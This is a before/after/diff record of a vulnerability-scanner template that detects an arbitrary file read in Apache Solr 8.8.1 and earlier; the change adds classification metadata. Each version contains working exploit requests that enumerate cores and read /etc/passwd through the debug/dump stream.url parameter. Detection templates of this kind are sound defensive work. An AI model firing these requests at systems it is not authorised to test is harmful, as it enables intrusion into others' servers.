vulnerabilities/apache/apache-solr-file-read.yaml (before)
id: apache-solr-file-read

info:
  name: Apache Solr <= 8.8.1 Arbitrary File Read
  author: DhiyaneshDk
  severity: high
  reference:
    - https://twitter.com/Al1ex4/status/1382981479727128580
    - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
    - https://twitter.com/sec715/status/1373472323538362371
  tags: apache,solr,lfi

requests:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

      - |
        GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

    extractors:
      - type: regex
        internal: true
        name: core
        group: 1
        regex:
          - '"name"\:"(.*?)"'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0:"

vulnerabilities/apache/apache-solr-file-read.yaml (after)
id: apache-solr-file-read

info:
  name: Apache Solr <= 8.8.1 - Local File Inclusion
  author: DhiyaneshDk
  severity: high
  description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion.
  reference:
    - https://twitter.com/Al1ex4/status/1382981479727128580
    - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
    - https://twitter.com/sec715/status/1373472323538362371
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: apache,solr,lfi

requests:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

      - |
        GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

    extractors:
      - type: regex
        internal: true
        name: core
        group: 1
        regex:
          - '"name"\:"(.*?)"'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0:"

# Enhanced by mp on 2022/07/22

vulnerabilities/apache/apache-solr-file-read.yaml (diff)
@@ -1,13 +1,18 @@
 id: apache-solr-file-read
 
 info:
-  name: Apache Solr <= 8.8.1 Arbitrary File Read
+  name: Apache Solr <= 8.8.1 - Local File Inclusion
   author: DhiyaneshDk
   severity: high
+  description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion.
   reference:
     - https://twitter.com/Al1ex4/status/1382981479727128580
     - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
     - https://twitter.com/sec715/status/1373472323538362371
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: apache,solr,lfi
 
 requests:
@@ -41,3 +46,5 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/07/22
